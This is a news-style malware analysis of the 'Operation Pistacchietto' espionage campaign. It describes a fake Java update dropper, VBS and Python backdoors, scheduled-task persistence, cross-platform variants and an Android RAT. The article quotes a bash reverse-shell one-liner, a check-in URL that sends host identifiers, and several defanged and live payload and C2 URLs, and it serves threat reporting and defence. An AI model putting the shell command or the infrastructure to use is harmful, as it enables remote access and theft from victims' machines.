Pierluigi Paganini March 06, 2019

In the past weeks, a new strange campaign emerged in the cyber threat Italian landscape, it has been tracked as “Operation Pistacchietto.”

Introduction

In the past weeks, a new strange campaign emerged in the Italian landscape. It has been baptized “Operation Pistacchietto” from a username extracted from a Github account used to serve some part of the malware. This campaign has been initially studied by C.R.A.M. researchers reporting the attacker seems to be Italian, as evidenced by some Italian words like “pistacchietto” or “bonifico” discovered into analyzed file names and scripts, and due to the location of most of the command and control servers.

After an initial recon, Cybaz-Yoroi ZLAB detected some peculiarities and interesting TTPs in place in this malicious operation, so we decided to dig further and analyze more samples related to this mysterious actor.

Technical analysis

The campaign is not very trivial and it is composed of several, specific, malware, created to hit devices belonging to different platforms, both desktop, and mobile. In the following sections, we analyze some of this malware, divided by targets’ architecture.

MS Windows Samples

The story starts from a basic fake Java page, inviting the user to update his Java version clicking on the link. 

Despite the page reports the filename “window-update.hta”, clicking on “Update” a file .bat will be downloaded.

Uploading this .bat file on VirusTotal emerges that it has a very low detection rate: only four anti-malwares were able to detect it.

Inspecting the win.bat source code, at first glance, it seems to be written by a script kiddie or to be a first draft due the huge amount of comments. Moreover, the script is composed by two part: a first one includes a trick to ask user administrative privileges, the second one aims to download other components and to set persistence using the Windows Task Scheduler (schtasks). As shown in figure, the first part simply corresponds to a code snipped retrieved from Github public repositories.

The second part, instead, checks the machine architecture and, depending on it, the malware downloads the right components, that are:

• A text file containing new actions to execute, from config01.homepc[.it/svc/wup.php?pc=pdf_%computername%
• The NETCAT utility for Windows, from config01.homepc[.it/win/nc64.exe and config01.homepc[.it/win/nc.exe
• The WGET utility for Windows, from config01.homepc[.it/win/wget.exe and config01.homepc[.it/win/wget32.exe
• Other malicious artifacts, from:
  • config01.homepc[.it/win/get.vbs
  • config01.homepc[.it/win/sys.xml
  • config01.homepc[.it/win/syskill.xml
  • config01.homepc[.it/win/office_get.xml
  • config01.homepc[.it/win/woffice.exe
  • config01.homepc[.it/win/init.vbs
  • config01.homepc[.it/win/winsw.exe

From the snippet, a series of commented URL paths emerge, which is the proof that the malware is under maintenance yet. During the analysis days, indeed, the bat file and some other artifacts are constantly changed and updated, adding and removing code lines, changing variables names, but without changing the server URL or the general behavior. These modifications, even if related to attacker’s proofs or test cases, make the file constantly low-detectable by anti-malwares, because its signatures change each time.

Other URLs embedded into the script, in commented way, are:

• hxxps://github[.com/pistacchietto/Win-Python-Backdoor/raw/master
• hxxp://verifiche.ddns[.net/{some_files}

Inspecting the repository, we found some artifacts also hosted on the config01.homepc[.it/win/ location, so probably the attacker used that platform during the development phase and config01.homepc.it as real server containing “production” malware. The URL verifiche.ddns[.netseems to be down at time of writing, it could be a server used in an old version of this malicious project or in a future one.

After downloading all the components, the batch script implants most of them into %windir% folder and one of them, the core of the malware, into C:\Program Files\Windows Defender. Then, the script registers some automatic tasks through schtasks in order to start periodically the malicious artifacts. 

The following section reports a brief analysis of these malicious files.

Sample “office_get.xml”

It is a simple XML file in which is defined the configuration for a new scheduled task. In particular, the task created using this configuration file has the only purpose of execute, in periodic way, a VisualBasic script located in C:\WINDOWS\get.vbs.

Sample “get.vbs”

The script downloads a shared file from Google Drive: https://drive.google [.com/uc?export=download&id=1nT2hQWW1tOM_yxPK5_nhIm8xBVETGXdF

using a MSXML2.ServerXMLHTTP object. The file contains a list of servers URLs, as shown in figure:

Two of them are IPv6 addresses: the usage of the new IP address standard is a rare feature in malware landscape. From the whois information related to these IPv6 addresses emerges that they are registered on the global ISP Hurricane Electric. This company also provides a free IPv6 Tunnel Broker service, able to act as a link between IPv4 and IPv6 protocols. There is no direct evidence of activity on that IPv6 addresses, however we think probably the attacker decided to masquerades its C2, which normally works over IPv4, behind the Hurricane’s IPv6 tunnel in order to make detection more difficult. 

During the check-in, the malware proceed to extract some PC information, like computer name and MAC address, which will be sent to the server using a path composed by:

http://" & serverURL & "/svc/wup.php?pc=" & strComputerName & "_" & mac

The server responds with an encoded message indicating new actions the malware should perform. However, the VBS script seems to check only the “exec” field, as shown in figure.

If “exec” parameter is set to “1”, then the script extracts the value of “cmd” parameter, containing the new command to execute, and run it on Shell. All the other fields, at the moment, are not considered by the malware, indicating that it may be still under development.

After executing the received commands, the script opens connection towards malicious server using the Netcat tool previously downloaded, providing to the attacker an access to the victim’s shell.

Samples “woffice.exe”, “woffice2.exe” and “NisSrv.exe”

The “woffice2.exe” and “NisSrv.exe” files are equal to “woffice.exe”, which is simply the compiled version of “woffice.py”, the Python source file hosted in the “Pistacchietto” repository. The Python code has the same behavior of the VBS bot previously analyzed, but it uses different C2 URLs, such as:

So, the attacker created different copies of the same malicious backdoor, and set them to run at the same time, probably as resilience technique.

Samples “sys.xml” and “syskill.xml”

These files are two XML task scheduler configurations, which embed the following commands:

So, the first one starts a TCP connection every 1 minute using Netcat (“nc64.exe”), as previously shown, towards a new server “config02.addns[.org”. The second one, instead, kills all the active processes named “nc64.exe” every 5 minutes.

Linux, OSX and Android Samples

The attacker’s arsenal seems to be composed of weapons for different architectures: beyond Windows, there are some samples related to Linux, Mac, and Android devices.

In the Windows, Linux and Mac variant of the malware, the behavior is always the same: it implants the automatic execution of the Python backdoor previously shown.

In the following figure is shown the initial bash file used to set the schedule of the “woffice.py” backdoor, through the “crontab” and “systemctl” Linux commands.

Obviously, all the Windows commands executed into the Win version of the backdoor must be replaced by the Unix one. So, the command “bash -i >& /dev/tcp/ip/port 0>&1” takes the place of the instruction used to establish the Netcat reverse shell in Windows. 

The Mac backdoor is very similar to Linux one, another time the “woffice.py” is the core payload.

Analyzing the repository emerges it is a copy of an OSX backdoor discussed in this blog post. Starting from this code, the attacker edited some modules to embed it in its own version of the backdoor. 

Moreover, the arsenal malicious arsenal counts also an Android RAT. It is a copy of the popular “AhMyth Android Rat”, edited by the attacker to include its command and control server’s IP addresses.

Conclusions

The “Pistacchietto” operation is more complex than we initially thought. Behind the lack of professional infrastructure, the “hiding in plain sight” strategy, the developer’s comments, the drafted malware code analyzed and the speculations about the possible amateur nature of this actor, we are in front of a long running espionage operation, active from years, and supporting at least four of the main computing platforms available nowadays, being able to infect Microsoft Windows hosts, Mac OSX systems, Linux servers and Android mobile devices.

We are still not aware of the purposes of this campaign, which could be most likely personally motivated rather than financially or state sponsored, but despite its limited numbers it represent an important warning security communities, individuals and companies should not ignore. Offensive capabilities to run criminal espionage operations are getting even more accessible to personally motivated cyber actors, confirming the expansion of the cyber threat panorama both in terms of volume and variety observed by security firms, observatories and associations from a decade ago to nowadays.

As a final remark, we would like to recall Italy also is not new of this kind of “fai–da-te” (homemade) espionage operations: back in 2017, the initially homemade Occhionero’s espionage campaign (CERT-Yoroi Early Warning N010117) lapped Public Administrations, notorious entrepreneurs and also the Italian Ex Prime Minister.

Further technical details, including Indicators of Compromise, are reported in the analysis published by the experts at the Cybaz-Yoroi ZLAB

https://blog.yoroi.company/research/op-pistacchietto-an-italian-job/

Pierluigi Paganini

(SecurityAffairs – Op Pistacchietto, malware)

[adrotate banner="5"]

[adrotate banner=”13″]